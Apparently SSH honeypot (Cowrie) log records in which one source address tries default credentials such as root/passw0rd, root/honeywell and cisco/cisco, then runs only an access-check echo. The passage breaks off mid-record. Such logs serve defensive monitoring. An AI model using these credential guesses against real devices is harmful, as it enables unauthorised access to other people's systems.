{"eventid":"cowrie.login.success","username":"root","password":"passw0rd","message":"login attempt [root/passw0rd] succeeded","sensor":"my-vps","timestamp":"2025-08-28T23:21:08.772629Z","src_ip":"212.227.235.229","session":"73d354fd446e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T23:21:09.138246Z","src_ip":"212.227.235.229","session":"73d354fd446e"}
{"eventid":"cowrie.command.input","input":"echo IoT_ACCESS_VERIFIED","message":"CMD: echo IoT_ACCESS_VERIFIED","sensor":"my-vps","timestamp":"2025-08-28T23:21:09.139181Z","src_ip":"212.227.235.229","session":"73d354fd446e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f3046d7200f5134df01cf48771ac8262490517582a2cf7bd8657953ea2ac01be","size":20,"shasum":"f3046d7200f5134df01cf48771ac8262490517582a2cf7bd8657953ea2ac01be","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/f3046d7200f5134df01cf48771ac8262490517582a2cf7bd8657953ea2ac01be after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:21:09.262885Z","src_ip":"212.227.235.229","session":"73d354fd446e"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:21:09.264115Z","src_ip":"212.227.235.229","session":"73d354fd446e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42040,"dst_ip":"1.2.3.4","dst_port":22,"session":"2a2efea8ab02","protocol":"ssh","message":"New connection: 212.227.235.229:42040 (1.2.3.4:22) [session: 2a2efea8ab02]","sensor":"my-vps","timestamp":"2025-08-28T23:21:09.394384Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T23:21:09.456693Z","src_ip":"212.227.235.229","session":"2a2efea8ab02"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T23:21:09.538296Z","src_ip":"212.227.235.229","session":"2a2efea8ab02"}
{"eventid":"cowrie.login.failed","username":"admin","password":"passw0rd","message":"login attempt [admin/passw0rd] failed","sensor":"my-vps","timestamp":"2025-08-28T23:21:11.014040Z","src_ip":"212.227.235.229","session":"2a2efea8ab02"}
{"eventid":"cowrie.session.closed","duration":"3.2","message":"Connection lost after 3.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:21:12.553465Z","src_ip":"212.227.235.229","session":"2a2efea8ab02"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58758,"dst_ip":"1.2.3.4","dst_port":22,"session":"0aa0fc080da1","protocol":"ssh","message":"New connection: 212.227.235.229:58758 (1.2.3.4:22) [session: 0aa0fc080da1]","sensor":"my-vps","timestamp":"2025-08-28T23:21:12.658150Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T23:21:12.934422Z","src_ip":"212.227.235.229","session":"0aa0fc080da1"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T23:21:12.935141Z","src_ip":"212.227.235.229","session":"0aa0fc080da1"}
{"eventid":"cowrie.login.success","username":"root","password":"default","message":"login attempt [root/default] succeeded","sensor":"my-vps","timestamp":"2025-08-28T23:21:14.867751Z","src_ip":"212.227.235.229","session":"0aa0fc080da1"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T23:21:16.174878Z","src_ip":"212.227.235.229","session":"0aa0fc080da1"}
{"eventid":"cowrie.command.input","input":"echo IoT_ACCESS_VERIFIED","message":"CMD: echo IoT_ACCESS_VERIFIED","sensor":"my-vps","timestamp":"2025-08-28T23:21:16.175664Z","src_ip":"212.227.235.229","session":"0aa0fc080da1"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f3046d7200f5134df01cf48771ac8262490517582a2cf7bd8657953ea2ac01be","size":20,"shasum":"f3046d7200f5134df01cf48771ac8262490517582a2cf7bd8657953ea2ac01be","duplicate":true,"duration":"0.4","message":"Closing TTY Log: var/lib/cowrie/tty/f3046d7200f5134df01cf48771ac8262490517582a2cf7bd8657953ea2ac01be after 0.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:21:16.551167Z","src_ip":"212.227.235.229","session":"0aa0fc080da1"}
{"eventid":"cowrie.session.closed","duration":"3.9","message":"Connection lost after 3.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:21:16.552399Z","src_ip":"212.227.235.229","session":"0aa0fc080da1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46556,"dst_ip":"1.2.3.4","dst_port":22,"session":"edc165b2e12f","protocol":"ssh","message":"New connection: 212.227.235.229:46556 (1.2.3.4:22) [session: edc165b2e12f]","sensor":"my-vps","timestamp":"2025-08-28T23:21:16.696320Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T23:21:17.067103Z","src_ip":"212.227.235.229","session":"edc165b2e12f"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T23:21:17.067862Z","src_ip":"212.227.235.229","session":"edc165b2e12f"}
{"eventid":"cowrie.login.failed","username":"admin","password":"default","message":"login attempt [admin/default] failed","sensor":"my-vps","timestamp":"2025-08-28T23:21:18.984301Z","src_ip":"212.227.235.229","session":"edc165b2e12f"}
{"eventid":"cowrie.session.closed","duration":"3.7","message":"Connection lost after 3.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:21:20.389984Z","src_ip":"212.227.235.229","session":"edc165b2e12f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34702,"dst_ip":"1.2.3.4","dst_port":22,"session":"54353517969b","protocol":"ssh","message":"New connection: 212.227.235.229:34702 (1.2.3.4:22) [session: 54353517969b]","sensor":"my-vps","timestamp":"2025-08-28T23:21:20.504650Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T23:21:21.078373Z","src_ip":"212.227.235.229","session":"54353517969b"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T23:21:21.079117Z","src_ip":"212.227.235.229","session":"54353517969b"}
{"eventid":"cowrie.login.success","username":"root","password":"honeywell","message":"login attempt [root/honeywell] succeeded","sensor":"my-vps","timestamp":"2025-08-28T23:21:21.770308Z","src_ip":"212.227.235.229","session":"54353517969b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T23:21:22.528026Z","src_ip":"212.227.235.229","session":"54353517969b"}
{"eventid":"cowrie.command.input","input":"echo IoT_ACCESS_VERIFIED","message":"CMD: echo IoT_ACCESS_VERIFIED","sensor":"my-vps","timestamp":"2025-08-28T23:21:22.528701Z","src_ip":"212.227.235.229","session":"54353517969b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f3046d7200f5134df01cf48771ac8262490517582a2cf7bd8657953ea2ac01be","size":20,"shasum":"f3046d7200f5134df01cf48771ac8262490517582a2cf7bd8657953ea2ac01be","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/f3046d7200f5134df01cf48771ac8262490517582a2cf7bd8657953ea2ac01be after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:21:22.857339Z","src_ip":"212.227.235.229","session":"54353517969b"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:21:22.858587Z","src_ip":"212.227.235.229","session":"54353517969b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45444,"dst_ip":"1.2.3.4","dst_port":22,"session":"3750e5b0168e","protocol":"ssh","message":"New connection: 212.227.235.229:45444 (1.2.3.4:22) [session: 3750e5b0168e]","sensor":"my-vps","timestamp":"2025-08-28T23:21:22.991138Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T23:21:23.209087Z","src_ip":"212.227.235.229","session":"3750e5b0168e"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T23:21:23.209949Z","src_ip":"212.227.235.229","session":"3750e5b0168e"}
{"eventid":"cowrie.login.failed","username":"admin","password":"honeywell","message":"login attempt [admin/honeywell] failed","sensor":"my-vps","timestamp":"2025-08-28T23:21:24.149505Z","src_ip":"212.227.235.229","session":"3750e5b0168e"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:21:25.327925Z","src_ip":"212.227.235.229","session":"3750e5b0168e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55624,"dst_ip":"1.2.3.4","dst_port":22,"session":"d56dd3859df0","protocol":"ssh","message":"New connection: 212.227.235.229:55624 (1.2.3.4:22) [session: d56dd3859df0]","sensor":"my-vps","timestamp":"2025-08-28T23:21:25.444859Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T23:21:25.527666Z","src_ip":"212.227.235.229","session":"d56dd3859df0"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T23:21:25.667480Z","src_ip":"212.227.235.229","session":"d56dd3859df0"}
{"eventid":"cowrie.login.failed","username":"admin","password":"1234","message":"login attempt [admin/1234] failed","sensor":"my-vps","timestamp":"2025-08-28T23:21:26.819467Z","src_ip":"212.227.235.229","session":"d56dd3859df0"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:21:28.361909Z","src_ip":"212.227.235.229","session":"d56dd3859df0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41806,"dst_ip":"1.2.3.4","dst_port":22,"session":"9550202ee862","protocol":"ssh","message":"New connection: 212.227.235.229:41806 (1.2.3.4:22) [session: 9550202ee862]","sensor":"my-vps","timestamp":"2025-08-28T23:21:28.480137Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T23:21:28.893777Z","src_ip":"212.227.235.229","session":"9550202ee862"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T23:21:28.894472Z","src_ip":"212.227.235.229","session":"9550202ee862"}
{"eventid":"cowrie.login.failed","username":"cisco","password":"cisco","message":"login attempt [cisco/cisco] failed","sensor":"my-vps","timestamp":"2025-08-28T23:21:30.601444Z","src_ip":"212.227.235.229","session":"9550202ee862"}
{"eventid":"cowrie.session.closed","duration":"3.9","message":"Connection lost after 3.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:21:32.350055Z","src_ip":"212.227.235.229","session":"9550202ee862"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58970,"dst_ip":"1.2.3.4","dst_port":22,"session":"5c27026d1423","protocol":"ssh","message":"New connection: 212.227.235.229:58970 (1.2.3.4:22) [session: 5c27026d1423]","sensor":"my-vps","timestamp":"2025-08-28T23:21:32.440578Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T23:21:32.613428Z","src_ip":"212.227.235.229","session":"5c27026d1423"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T23:21:32.614158Z","src_ip":"212.227.235.229","session":"5c27026d1423"}
{"eventid":"cowrie.login.success","username":"root","password":"rootpass","message":"login attempt [root/rootpass] succeeded","sensor":"my-vps","timestamp":"2025-08-28T23:21:33.972354Z","src_ip":"212.227.235.229","session":"5c27026d1423"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T23:21:34.895561Z","src_ip":"212.227.235.229","session":"5c27026d1423"}
{"eventid":"cowrie.command.input","input":"echo IoT_ACCESS_VERIFIED","message":"CMD: echo IoT_ACCESS_VERIFIED","sensor":"my-vps","timestamp":"2025-08-28T23:21:34.896229Z","src_ip":"212.227.235.229","session":"5c27026d1423"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f3046d7200f5134df01cf48771ac8262490517582a2cf7bd8657953ea2ac01be","size":20,"shasum":"f3046d7200f5134df01cf48771ac8262490517582a2cf7bd8657953ea2ac01be","duplicate":true,"duration":"0.5","message":"Closing TTY Log: var/lib/cowrie/tty/f3046d7200f5134df01cf48771ac8262490517582a2cf7bd8657953ea2ac01be after 0.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:21:35.367182Z","src_ip":"212.227.235.229","session":"5c27026d1423"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:21:35.368443Z","src_ip":"212.227.235.229","session":"5c27026d1423"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44736,"dst_ip":"1.2.3.4","dst_port":22,"session":"43280dd4220b","protocol":"ssh","message":"New connection: 212.227.235.229:44736 (1.2.3.4:22) [session: 43280dd4220b]","sensor":"my-vps","timestamp":"2025-08-28T23:21:35.502909Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T23:21:36.905791Z","src_ip":"212.227.235.229","session":"43280dd4220b"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@ope